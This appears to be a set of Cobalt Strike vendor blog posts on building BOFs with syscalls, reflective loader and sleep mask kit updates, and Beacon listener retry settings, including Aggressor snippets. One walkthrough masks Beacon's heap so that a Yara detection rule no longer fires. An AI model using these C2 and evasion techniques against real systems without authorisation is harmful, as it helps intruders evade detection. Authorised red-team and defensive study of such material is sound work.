We’ll also need to make a small change to the function GetSyscallAddress in order to set the syscall address to fs:[0xc0] if the process is WoW64:

PVOID GetSyscallAddress(void)
{
#ifdef _WIN64
    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
#else
    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
#endif
 
#ifndef _WIN64
    if (IsWoW64())
    {
        // if we are a WoW64 process, jump to WOW32Reserved
        SyscallAddress = (PVOID)READ_MEMLOC(0xc0);
        return SyscallAddress;
    }
#endif
 
    // Return early if the SyscallAddress is already defined
    if (SyscallAddress)
    {
        // make sure the instructions have not been replaced
        if (!strncmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
            return SyscallAddress;
    }
 
    // set the fallback as the default
    SyscallAddress = (PVOID)DoSysenter;
    …

Finally, we’ll update our Makefile to compile for both 64-bit and 32-bit.

Makefile

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
CC_x86 := i686-w64-mingw32-gcc
STRIP_x64 := x86_64-w64-mingw32-strip
STRIP_x86 := i686-w64-mingw32-strip
 
all:
    $(CC_x64) -c program.c -o compiled/$(BOFNAME).x64.o   -masm=intel -Wall -DBOF
    $(STRIP_x64) --strip-unneeded compiled/$(BOFNAME).x64.o
 
    $(CC_x86) -c program.c -o compiled/$(BOFNAME).x86.o   -masm=intel -Wall -DBOF
    $(STRIP_x86) --strip-unneeded compiled/$(BOFNAME).x86.o

    $(CC_x64)    program.c -o compiled/$(BOFNAME).x64.exe -masm=intel -Wall
    $(STRIP_x64) --strip-all compiled/$(BOFNAME).x64.exe
 
    $(CC_x86)    program.c -o compiled/$(BOFNAME).x86.exe -masm=intel -Wall
    $(STRIP_x86) --strip-all compiled/$(BOFNAME).x86.exe
 
clean:
    rm compiled/$(BOFNAME).*.*

Conclusion

To summarize, this post explored several technical solutions to achieve the following objectives:

  • Create executables as well as BOF using the same codebase
  • Use syscalls from ntdll.dll instead of using them directly from an unknown module
  • Strip executables to make them smaller and harder to analyze
  • Run on both 64-bit and 32-bit
  • Have partial support for syscalls in WoW64

If you want to see an example of all this working together, check out nanodump.

User Defined Reflective Loader (UDRL) Update in Cobalt Strike 4.5

The User Defined Reflective Loader (UDRL) was first introduced in Cobalt Strike 4.4 to allow the creation and use of a custom reflective loader. This quickly took off in the community and its limits were pushed. Updates were made in 4.5 to help address some of these limits.

Updates

Increased Size

A new hook BEACON_DLL_SIZE was added to specify either 5k or 100k for your custom loader. This increase will be reflected in your payloads.

Artifact Kit

The artifact kit has been updated to allow customization of sizes to ensure space is available for your loader.

UDRL and Malleable C2 Profile Consideration

When using the default reflective loader and generating Beacons, there are a few settings that affect Beacon’s runtime configuration and the loader, which are automatically handled when the payload is generated. This allows an operator to change these settings in the profile, which modifies how the payload is generated and how it looks in memory.

When using a UDRL, these settings are still inserted into Beacon’s runtime configuration. However, because the reflective loader is defined by the user, Cobalt Strike cannot modify it as it does in the default case. It is up to the user to modify their reflective loader accordingly.

For example, if you are using the example loader from the UDRL kit, there is no code in the loader to do any conditional setup based on information stored in the header of the image. Depending on the settings in your Malleable C2 profile, this could cause unexpected runtime issues with Beacon. You will have to deal with the same type of issues when writing your own reflective loader from scratch.

Settings to be Considered

The following are settings to consider when the malleable C2 profile option stage.sleepmask is set to TRUE:

stage.userwx 

This setting is a Boolean and informs the default loader to either use RWX or RX memory. At runtime Beacon will either include or not include the .text section for masking. If the setting is set to TRUE, your user defined loader needs to set the protection on the .text section as RWX otherwise Beacon will crash. If the setting is set to FALSE, your user defined loader should set the protection on the .text section as RX as the .text section will not be masked. 

stage.obfuscate 

This setting is a Boolean and informs the default loader to either copy the header or not copy the header into memory. At runtime Beacon will either include or not include the header section for masking. If the setting is set to TRUE, your UDRL should not copy the header into memory as Beacon will not mask the header section. If the setting is set to FALSE, your user defined loader should copy the header into memory as Beacon will mask the header section. 

Depending on how sophisticated your reflective loader is you will need to make sure the settings in the Malleable C2 profile will work with how the Beacon payload is loaded into memory. With the BEACON_RDLL_GENERATE and BEACON_RDLL_GENERATE_LOCAL aggressor script hooks you do have the opportunity to modify your reflective loader by using the aggressor script pe_* functions. 
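The two rules above can be condensed into a small decision helper. This is only a sketch of the logic as described in this post: the StageSettings structure and both function names are hypothetical, and how your loader learns the profile values (hard-coded, patched in by an Aggressor hook, and so on) is left open. The two protection constants use the values from the Windows headers.

```c
#include <stdbool.h>

/* Windows memory protection constants (values as defined in winnt.h). */
#define PAGE_EXECUTE_READ      0x20
#define PAGE_EXECUTE_READWRITE 0x40

/* Hypothetical view of the two profile settings the loader must honour. */
typedef struct {
    bool userwx;    /* stage.userwx */
    bool obfuscate; /* stage.obfuscate */
} StageSettings;

/* Protection the loader should apply to the .text section.
 * userwx TRUE  -> Beacon masks .text, so it must be writable (RWX).
 * userwx FALSE -> .text is not masked, so RX is sufficient. */
unsigned long text_protection(const StageSettings *settings)
{
    return settings->userwx ? PAGE_EXECUTE_READWRITE : PAGE_EXECUTE_READ;
}

/* Whether the loader should copy the PE header into memory.
 * obfuscate TRUE  -> Beacon will not mask the header, so do not copy it.
 * obfuscate FALSE -> Beacon will mask the header, so it must be present. */
bool should_copy_header(const StageSettings *settings)
{
    return !settings->obfuscate;
}
```

Keeping both decisions in one place makes it easier to check a loader against a profile before generating payloads.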

Handling a UDRL over 5k

The following is an example error that indicates your loader is over 5k. You can use the BEACON_DLL_SIZE hook to increase this space to 100k.

Loader is over 5k

Artifact Kit Considerations

If you are using an artifact kit based on the kit provided by Cobalt Strike, but it is built with the default 'stagesize' values, this error is logged, indicating that the larger patched Beacon will not fit in the standard artifacts generated for the kit. You will need to rebuild the artifact kit with larger 'stagesize' environment variable definitions.

Artifact kit hook error when the stagesize value is too low

Sleep Mask Update in Cobalt Strike 4.5

The Sleep Mask Kit was first introduced in Cobalt Strike 4.4 to allow users to modify how the sleep mask function looks in memory in order to defeat static signatures that identified Beacon. This quickly took off in the community and its limits were pushed. Updates were made in 4.5 to help address some of these limits.

Licensed users can download the updated kit from https://www.cobaltstrike.com/scripts

What’s New?

Increased size 

The size of the sleep mask executable code has been increased to 769 bytes from 289 bytes. 

Heap Memory 

A list of heap memory addresses has been added to the input to the sleep mask function. This makes it possible to mask and unmask Beacon’s heap memory, whose contents could otherwise be used to identify Beacon.

Compatibility

Any sleep mask modifications for Cobalt Strike 4.4 will not be compatible with 4.5 because of the changes to the function’s input. This also means that 4.5 sleep mask modifications are not backwards compatible. Users will need to have separate sleep mask versions for 4.4 and 4.5. An updated sleep mask kit is available through the Cobalt Strike UI Help -> Arsenal page.

Changes 

  • Added a new HEAP_RECORDS data structure 
  • Added a pointer to the HEAP_RECORDS data structure to the existing SLEEPMASKP structure 
  • Added new loops to mask and unmask the heap memory identified by the HEAP_RECORDS structure. 
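To give a feel for what such a loop does, here is a minimal sketch. It is not the kit’s code: the field layout of HEAP_RECORD, the NULL-terminated list, the XOR scheme and the MASK_SIZE value are all assumptions made for illustration.

```c
#include <stddef.h>

#define MASK_SIZE 13 /* assumed key length for this sketch */

/* Hypothetical layout of one heap record. */
typedef struct {
    char  *ptr;  /* start of a heap block owned by Beacon */
    size_t size; /* length of that block in bytes */
} HEAP_RECORD;

/* XOR every byte of every recorded heap block with a repeating key.
 * Calling it a second time with the same key restores the original bytes,
 * so the same loop serves for both masking and unmasking.
 * The list is assumed to end with a record whose ptr is NULL. */
void xor_heap_records(HEAP_RECORD *records, const char *mask)
{
    for (size_t i = 0; records[i].ptr != NULL; i++) {
        for (size_t j = 0; j < records[i].size; j++) {
            records[i].ptr[j] ^= mask[j % MASK_SIZE];
        }
    }
}
```

The sketch is a single function that calls nothing else, in keeping with the kit limitations described in this post.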

Limitations

These are the current limitations to the sleep mask kit for Cobalt Strike 4.5:

  • The executable code size cannot exceed 769 bytes. If this occurs the default sleep mask function will be used. 
  • Only one function can be defined in the source code file. 
  • Use of external functions is not supported.

Example

This example uses the Sleep Mask Kit for Cobalt Strike 4.5, with the code modified to only mask and unmask when the sleep time is larger than two seconds. This makes it possible to control the masking and unmasking of Beacon based on the current sleep time.

Generate a Beacon using the modified sleep mask and deploy it on your target system. The Beacon is now running and has a PID value of 5400 for this example. 

Using a Yara rule based on the BeaconEye project, Beacon is detected. Because the current sleep time is set to 1 second, Beacon is not masked, and the rule reports the memory address that triggered the detection.

Detected at 0x7c7290

Using Process Hacker, open the process (5400) and look at the contents of memory at the reported location, 0x7c7290. To find it, locate the heap block with base address 0x7b0000 and subtract that base from 0x7c7290 to get the offset within the block.
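The offset calculation is plain pointer arithmetic. As a quick sketch (the helper name is ours, not part of any tool):

```c
#include <stdint.h>

/* Offset of a detected address inside the heap block that starts at `base`. */
uintptr_t heap_offset(uintptr_t address, uintptr_t base)
{
    return address - base;
}
```

With the values from this example, heap_offset(0x7c7290, 0x7b0000) gives 0x17290, which is the offset to scroll to inside that block.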

Beacon’s configuration unmasked

The highlighted portion shows the signature that was used to identify Beacon, which represents Beacon’s configuration in the heap memory. 

With the Cobalt Strike version 4.5 sleep mask, this location in memory is provided as one of the heap memory addresses in the HEAP_RECORDS list. Now, update the sleep time for this Beacon to three seconds so it will mask itself while sleeping, and then inspect this memory location again.

Beacon’s Configuration masked

Comparing this to the previous screenshot shows the heap memory is now masked. Running the Yara rule again shows that it does not detect the signature for Beacon’s configuration.

This is just one simple example of using the sleep mask to obfuscate Beacon in memory.

Enjoy!

A Deeper Look Into the Max Retry Strategy Option

A complementary strategy to the Host Rotation Strategy was introduced in Cobalt Strike 4.5. The max retry strategy was added to HTTP, HTTPS, and DNS Beacon listeners. A max retry strategy allows a Beacon to exit after a specified failure count. As the failure count increases, sleep is adjusted to a specified value. By default, sleep is adjusted at 50% of the failure count.

A max retry can be selected from a list via the create listener GUI:

max retry option set as a listener option

The list can be updated with custom values using the aggressor hook LISTENER_MAX_RETRY_STRATEGIES.

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_hooks.htm#LISTENER_MAX_RETRY_STRATEGIES

Setting the values in Aggressor allows any combination of options to be offered, rather than only those in the default list.

# Use a hard coded list of strategies
set LISTENER_MAX_RETRY_STRATEGIES {
    local('$out');
    $out .= "exit-18-12-5m\n";
    $out .= "exit-22-14-5m\n";
    return $out;
}
 
# Use loops to build a list of strategies
set LISTENER_MAX_RETRY_STRATEGIES {
    local('$out');
 
    @attempts = @(50, 100);
    @durations = @("5m", "15m");
    $increase = 25;
 
    foreach $attempt (@attempts)
    {
        foreach $duration (@durations)
        {
            $out .= "exit $+ - $+ $attempt $+ - $+ $increase $+ - $+ $duration\n";
        }
    }
 
    return $out;
}

Understanding the Max Retry Syntax

Max Retry Strategy Syntax

The syntax is broken into four sections separated by a dash:

Column  Description
1       exit
2       Exit beacon after this number of failures
3       Number of failures after which to begin adjusting sleep
4       Sleep time to set once that number of failures is met. Note: The jitter is kept at the current setting.
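To make the four columns concrete, here is a small sketch that parses a strategy string and decides what a given failure count means. It is an illustration, not Beacon’s implementation: the MaxRetry structure, both function names and the use of >= comparisons are our assumptions. Only the m (minutes) suffix appears in this post, so other suffixes are rejected here rather than guessed.

```c
#include <stdio.h>

/* Hypothetical parsed form of "exit-<exit_after>-<adjust_after>-<sleep>m". */
typedef struct {
    int  exit_after;    /* column 2: exit after this many failures */
    int  adjust_after;  /* column 3: start adjusting sleep at this many failures */
    long sleep_seconds; /* column 4: new sleep time, converted to seconds */
} MaxRetry;

typedef enum { RETRY_KEEP, RETRY_ADJUST_SLEEP, RETRY_EXIT } RetryAction;

/* Returns 0 on success, -1 if the string does not match the expected shape. */
int parse_max_retry(const char *text, MaxRetry *out)
{
    int  exit_after, adjust_after;
    long amount;
    char unit, extra;

    /* The trailing %c only matches if junk follows the unit, so a valid
     * string converts exactly four fields. */
    int fields = sscanf(text, "exit-%d-%d-%ld%c%c",
                        &exit_after, &adjust_after, &amount, &unit, &extra);
    if (fields != 4 || unit != 'm')
        return -1;
    if (exit_after <= 0 || adjust_after < 0 || amount < 0)
        return -1;

    out->exit_after    = exit_after;
    out->adjust_after  = adjust_after;
    out->sleep_seconds = amount * 60;
    return 0;
}

/* What should happen after `failures` consecutive failed check-ins. */
RetryAction retry_action(const MaxRetry *strategy, int failures)
{
    if (failures >= strategy->exit_after)
        return RETRY_EXIT;
    if (failures >= strategy->adjust_after)
        return RETRY_ADJUST_SLEEP;
    return RETRY_KEEP;
}
```

For "exit-10-5-5m", this reading means the sleep time changes to five minutes once five failures are reached, and Beacon exits at ten.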

Using Aggressor to Create a Listener

If you use aggressor to create listeners, you can set the max retry using the max_retry option. This can be set to your custom max retry strategy without the need to be pre-defined.

Below is an example of the listener_create_ext function used to create a listener.

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#listener_create_ext

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      max_retry => "exit-10-5-5m",
      proxy => "proxy.host"));

TIP: Running Cobalt Strike Teamserver as a Service

These scripts can be used as a template to set up teamserver as a service and to auto-start listeners.

https://github.com/vestjoe/cobaltstrike_services